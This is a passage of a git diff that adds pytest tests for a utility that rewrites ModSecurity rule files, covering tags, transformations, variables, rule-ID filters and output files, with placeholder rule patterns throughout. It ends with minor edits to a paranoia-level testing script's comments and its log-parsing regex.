"@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_with_chain(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_skip_chain(self): + arguments = [ + "--append-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTag: + def test_remove_tag_with_no_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_existing_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_chain(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tag_skip_chain(self): + arguments = [ + "--remove-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRenameTag: + def test_rename_tag_with_no_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_rename_tag_with_existing_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_with_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'bar'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_skip_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestSortTags: + def test_sort_tags(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_with_chain(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_skip_chain(self): + arguments = [ + "--sort-tags", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_test.py b/util/rule_ctl/tests/rule_ctl_test.py new file mode 100644 index 0000000000..f7114ceafa --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_test.py @@ -0,0 +1,195 @@ +from .helpers import * + +class TestFilterRuleId: + def test_filter_rule_id_exact_match(self): + arguments = [ + "--filter-rule-id", "12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_prefix_match(self): + arguments = [ + "--filter-rule-id", "^12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_suffix_match(self): + arguments = [ + "--filter-rule-id", ".*22$", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_no_match(self): + arguments = [ + "--filter-rule-id", "11", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestLineNumbers: + def test_line_numbers_identical(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" + +SecRule ARGS "@rx bar" "id:13" +""" + expected = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" + +SecRule ARGS "@rx bar" "id:13,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_down(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_up(self): + arguments = [ + "--remove-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:foo" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestTargetFile: + def test_target_file(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--target-file", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() + + def test_target_file_uses_config_as_default(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--config", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() diff --git a/util/rule_ctl/tests/rule_ctl_transformations_test.py b/util/rule_ctl/tests/rule_ctl_transformations_test.py new file mode 100644 index 0000000000..f1db898f10 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_transformations_test.py @@ -0,0 +1,281 @@ +from .helpers import * + +class TestAppendTfunc: + def test_append_tfunc_with_no_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_existing_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_duplicate_transformation(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:lower,\\ + t:urlDecode" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_in_correct_order(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + log:'log',\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + t:lower,\\ + log:'log',\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_with_chain(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_skip_chain(self): + arguments = [ + "--append-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTfunc: + def test_remove_tfunc_with_no_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tfunc_with_existing_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_multiple_args(self): + arguments = [ + "--remove-tfunc", "lower", + "--remove-tfunc", "decodeUrl" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_chain(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_skip_chain(self): + arguments = [ + "--remove-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_retains_correct_line_numbers(self): + arguments = [ + "--remove-tfunc", "lowercase" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,t:lowercase,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_variables_test.py b/util/rule_ctl/tests/rule_ctl_variables_test.py new file mode 100644 index 0000000000..48923aaf59 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_variables_test.py @@ -0,0 +1,327 @@ +from .helpers import * + +class TestAppendVariable: + def test_append_variable_with_one_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_existing_variables(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_duplicate_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_multiple_args(self): + arguments = [ + "--append-variable", "XML", + "--append-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML|DURATION "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_with_chain(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_skip_chain(self): + arguments = [ + "--append-variable", "XML", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveVariable: + def test_remove_variable_with_no_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_existing_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_multiple_args(self): + arguments = [ + "--remove-variable", "XML", + "--remove-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_with_chain(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_skip_chain(self): + arguments = [ + "--remove-variable", "XML", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceVariable: + def test_replace_variable_name_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_multiple_args(self): + arguments = [ + "--replace-variable", "XML,ARGS:xml", + "--replace-variable", "DURATION,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_skip_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,!DURATION:half-life", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|!DURATION:half-life|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_multiple_args(self): + arguments = [ + "--replace-variable", "&XML,ARGS:xml", + "--replace-variable", "!DURATION:half-life,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|&XML|ARGS:foo|!DURATION:half-life|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_skip_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/send-payload-pls.sh b/util/send-payload-pls.sh index b769a930dd..168736a0b8 100755 --- a/util/send-payload-pls.sh +++ b/util/send-payload-pls.sh @@ -24,14 +24,14 @@ # # The anomaly score envvar can be set as follows: # SecAction "id:90101,phase:5,pass,nolog,\ -# setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}" +# setenv:ModSecAnomalyScoreIn=%{TX.blocking_inbound_anomaly_score}" # # Sample rule to setup the PL dynamically from localhost" # SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ # "id:90102,phase:1,pass,capture,log,auditlog,\ # msg:'Setting engine to PL%{matched_var}',chain" # SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ -# "setvar:'tx.executing_paranoia_level=%{matched_var}'" +# "setvar:'tx.detection_paranoia_level=%{matched_var}'" # Path to CRS rule set and local files CRS="/usr/share/modsecurity-crs/rules" @@ -75,6 +75,7 @@ do echo "Usage:" echo " --access \"/apache/logs/access.log\"" echo " --error \"/apache/logs/error.log\"" + echo " --crs \"/usr/share/modsecurity-crs/rules\"" echo " --url \"localhost:40080\"" echo " --resolve \"someservername:40080:localhost\"" echo " --protocol \"https\"" @@ -143,20 +144,20 @@ for PL in 1 2 3 4; do # The automatic format detection may cause the script to malfunction. # Uncomment only the required format. # To use Christian's accesslog format uncomment the following line - uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) + #uniq_id=$(tail -1 $accesslog | cut -d\" -f11 | cut -b2-26) # To use Spartan's accesslog format (21 col) uncomment the following line #uniq_id=$(tail -1 $accesslog | awk '{print $21}') # To use the automatic unique_id detection uncomment the following line - #uniq_id=$(tail -1 $accesslog | egrep -o '[a-zA-Z0-9]{26,28}') + uniq_id=$(tail -1 $accesslog | egrep -o '\b[a-zA-Z0-9_-]{26,28}\b') echo "Tracking unique id: $uniq_id" - grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" 